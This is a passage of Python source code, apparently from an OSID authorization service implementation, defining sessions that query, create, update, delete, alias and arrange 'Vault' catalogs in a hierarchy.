*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bin_query_template
return queries.VaultQuery(runtime=self._runtime)
vault_query = property(fget=get_vault_query)
@utilities.arguments_not_none
def get_vaults_by_query(self, vault_query):
"""Gets a list of ``Vault`` objects matching the given search.
arg: vault_query (osid.authorization.VaultQuery): the vault
query
return: (osid.authorization.VaultList) - the returned
``VaultList``
raise: NullArgument - ``vault_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bins_by_query_template
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_query(vault_query)
query_terms = dict(vault_query._query_terms)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
class VaultAdminSession(abc_authorization_sessions.VaultAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Vaults``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Vault,`` a ``VaultForm`` is requested using
``get_vault_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``VaultForm`` will indicate that it is to be used with a create
operation and can be used to examine metdata or validate data prior
to creation. Once the ``VaultForm`` is submiited to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``VaultForm`` corresponds
to an attempted transaction.
For updates, ``VaultForms`` are requested to the ``Vault`` ``Id``
that is to be updated using ``getVaultFormForUpdate()``. Similarly,
the ``VaultForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``VaultForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Vaults``. It is safer to remove all
mappings to the ``Vault`` catalogs before deletion.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
_session_namespace = 'authorization.VaultAdminSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_admin_session()
self._forms = dict()
self._kwargs = kwargs
def can_create_vaults(self):
"""Tests if this user can create ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalogs()
return True
@utilities.arguments_not_none
def can_create_vault_with_record_types(self, vault_record_types):
"""Tests if this user can create a single ``Vault`` using the desired record types.
While ``AuthorizationManager.getVaultRecordTypes()`` can be used
to examine which records are supported, this method tests which
record(s) are required for creating a specific ``Vault``.
Providing an empty array tests if a ``Vault`` can be created
with no records.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (boolean) - ``true`` if ``Vault`` creation using the
specified ``Types`` is supported, ``false`` otherwise
raise: NullArgument - ``vault_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bin_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalog_with_record_types(catalog_record_types=vault_record_types)
return True
@utilities.arguments_not_none
def get_vault_form_for_create(self, vault_record_types):
"""Gets the vault form for creating new vaults.
A new form should be requested for each create transaction.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (osid.authorization.VaultForm) - the vault form
raise: NullArgument - ``vault_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form qith requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_create_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_create(catalog_record_types=vault_record_types)
for arg in vault_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if vault_record_types == []:
result = objects.VaultForm(
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
else:
result = objects.VaultForm(
record_types=vault_record_types,
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
self._forms[result.get_id().get_identifier()] = not CREATED
return result
@utilities.arguments_not_none
def create_vault(self, vault_form):
"""Creates a new ``Vault``.
arg: vault_form (osid.authorization.VaultForm): the form for
this ``Vault``
return: (osid.authorization.Vault) - the new ``Vault``
raise: IllegalState - ``vault_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.create_bin_template
if self._catalog_session is not None:
return self._catalog_session.create_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('vault_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
insert_result = collection.insert_one(vault_form._my_map)
self._forms[vault_form.get_id().get_identifier()] = CREATED
result = objects.Vault(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_vaults(self):
"""Tests if this user can update ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` modification is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_vault_form_for_update(self, vault_id):
"""Gets the vault form for updating an existing vault.
A new vault form should be requested for each update
transaction.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.authorization.VaultForm) - the vault form
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_update_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_update(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
result = collection.find_one({'_id': ObjectId(vault_id.get_identifier())})
cat_form = objects.VaultForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[cat_form.get_id().get_identifier()] = not UPDATED
return cat_form
@utilities.arguments_not_none
def update_vault(self, vault_form):
"""Updates an existing vault.
arg: vault_form (osid.authorization.VaultForm): the form
containing the elements to be updated
raise: IllegalState - ``vault_form`` already used in an update
transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.update_bin_template
if self._catalog_session is not None:
return self._catalog_session.update_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if not vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('vault_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(vault_form._my_map) # save is deprecated - change to replace_one
self._forms[vault_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned
return objects.Vault(osid_object_map=vault_form._my_map, runtime=self._runtime, proxy=self._proxy)
def can_delete_vaults(self):
"""Tests if this user can delete vaults.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer delete
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_vault(self, vault_id):
"""Deletes a ``Vault``.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault`` to
remove
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.delete_bin_template
if self._catalog_session is not None:
return self._catalog_session.delete_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
for object_catalog in ['Authorization', 'Function', 'Qualifier', 'Vault']:
obj_collection = JSONClientValidated('authorization',
collection=object_catalog,
runtime=self._runtime)
if obj_collection.find({'assignedVaultIds': {'$in': [str(vault_id)]}}).count() != 0:
raise errors.IllegalState('catalog is not empty')
collection.delete_one({'_id': ObjectId(vault_id.get_identifier())})
def can_manage_vault_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Vault`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_vault(self, vault_id, alias_id):
"""Adds an ``Id`` to a ``Vault`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Vault`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another vault it is
reassigned to the given vault ``Id``.
arg: vault_id (osid.id.Id): the ``Id`` of a ``Vault``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``alias_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.alias_bin_template
if self._catalog_session is not None:
return self._catalog_session.alias_catalog(catalog_id=vault_id, alias_id=alias_id)
self._alias_id(primary_id=vault_id, equivalent_id=alias_id)
class VaultHierarchySession(abc_authorization_sessions.VaultHierarchySession, osid_sessions.OsidSession):
"""This session defines methods for traversing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``. The hierarchy may
be traversed recursively to establish the tree structure through
``get_parent_vaults()`` and ``getChildVaults()``. To relate these
``Ids`` to another OSID, ``get_vault_nodes()`` can be used for
retrievals that can be used for bulk lookups in other OSIDs. Any
``Vault`` available in the Authorization OSID is known to this
hierarchy but does not appear in the hierarchy traversal until added
as a root node or a child of another node.
A user may not be authorized to traverse the entire hierarchy. Parts
of the hierarchy may be made invisible through omission from the
returns of ``get_parent_vaults()`` or ``get_child_vaults()`` in lieu
of a ``PermissionDenied`` error that may disrupt the traversal
through authorized pathways.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: vault elements may be silently omitted or re-
ordered
* plenary view: provides a complete set or is an error condition
"""
_session_namespace = 'authorization.VaultHierarchySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchySession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_access_vault_hierarchy(self):
"""Tests if this user can perform hierarchy queries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if hierarchy traversal methods are
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.can_access_bin_hierarchy
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_access_catalog_hierarchy()
return True
def use_comparative_vault_view(self):
"""The returns from the vault methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Hierarchy`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def get_root_vault_ids(self):
"""Gets the root vault ``Ids`` in this hierarchy.
return: (osid.id.IdList) - the root vault ``Ids``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_root_catalog_ids()
return self._hierarchy_session.get_roots()
root_vault_ids = property(fget=get_root_vault_ids)
def get_root_vaults(self):
"""Gets the root vaults in this vault hierarchy.
return: (osid.authorization.VaultList) - the root vaults
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bins
if self._catalog_session is not None:
return self._catalog_session.get_root_catalogs()
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(list(self.get_root_vault_ids()))
root_vaults = property(fget=get_root_vaults)
@utilities.arguments_not_none
def has_parent_vaults(self, vault_id):
"""Tests if the ``Vault`` has any parents.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (boolean) - ``true`` if the vault has parents, ``false``
otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_parent_bins
if self._catalog_session is not None:
return self._catalog_session.has_parent_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_parents(id_=vault_id)
@utilities.arguments_not_none
def is_parent_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a direct parent of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is a parent of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``id`` or ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_parent_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_parent_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_parent(id_=vault_id, parent_id=id_)
@utilities.arguments_not_none
def get_parent_vault_ids(self, vault_id):
"""Gets the parent ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.id.IdList) - the parent ``Ids`` of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_parents(id_=vault_id)
@utilities.arguments_not_none
def get_parent_vaults(self, vault_id):
"""Gets the parents of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.authorization.VaultList) - the parents of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bins
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_parent_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_ancestor_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is an ancestor of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is an ancestor of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_ancestor_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_ancestor_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_ancestor(id_=id_, ancestor_id=vault_id)
@utilities.arguments_not_none
def has_child_vaults(self, vault_id):
"""Tests if a vault has any children.
arg: vault_id (osid.id.Id): a ``vault_id``
return: (boolean) - ``true`` if the ``vault_id`` has children,
``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_child_bins
if self._catalog_session is not None:
return self._catalog_session.has_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_children(id_=vault_id)
@utilities.arguments_not_none
def is_child_of_vault(self, id_, vault_id):
"""Tests if a vault is a direct child of another.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a child of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_child_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_child_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_child(id_=vault_id, child_id=id_)
@utilities.arguments_not_none
def get_child_vault_ids(self, vault_id):
"""Gets the child ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.id.IdList) - the children of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_child_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_children(id_=vault_id)
@utilities.arguments_not_none
def get_child_vaults(self, vault_id):
"""Gets the children of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.authorization.VaultList) - the children of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bins
if self._catalog_session is not None:
return self._catalog_session.get_child_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_child_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_descendant_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a descendant of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a descendant of
the ``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` is not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_descendant_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_descendant_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_descendant(id_=id_, descendant_id=vault_id)
@utilities.arguments_not_none
def get_vault_node_ids(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.hierarchy.Node) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_node_ids
if self._catalog_session is not None:
return self._catalog_session.get_catalog_node_ids(
catalog_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
return self._hierarchy_session.get_nodes(
id_=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
@utilities.arguments_not_none
def get_vault_nodes(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.authorization.VaultNode) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_nodes
return objects.VaultNode(self.get_vault_node_ids(
vault_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)._my_map, runtime=self._runtime, proxy=self._proxy)
class VaultHierarchyDesignSession(abc_authorization_sessions.VaultHierarchyDesignSession, osid_sessions.OsidSession):
"""This session defines methods for managing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``.
"""
_session_namespace = 'authorization.VaultHierarchyDesignSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_design_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_design_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_modify_vault_hierarchy(self):
"""Tests if this user can change the hierarchy.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known performing any update
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer these
operations to an unauthorized user.
return: (boolean) - ``false`` if changing this hierarchy is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.can_modify_bin_hierarchy_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_modify_catalog_hierarchy()
return True
@utilities.arguments_not_none
def add_root_vault(self, vault_id):
"""Adds a root vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: AlreadyExists - ``vault_id`` is already in hierarchy
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.add_root(id_=vault_id)
@utilities.arguments_not_none
def remove_root_vault(self, vault_id):
"""Removes a root vault from this hierarchy.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` not a parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.remove_root(id_=vault_id)
@utilities.arguments_not_none
def add_child_vault(self, vault_id, child_id):
"""Adds a child to a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the new child
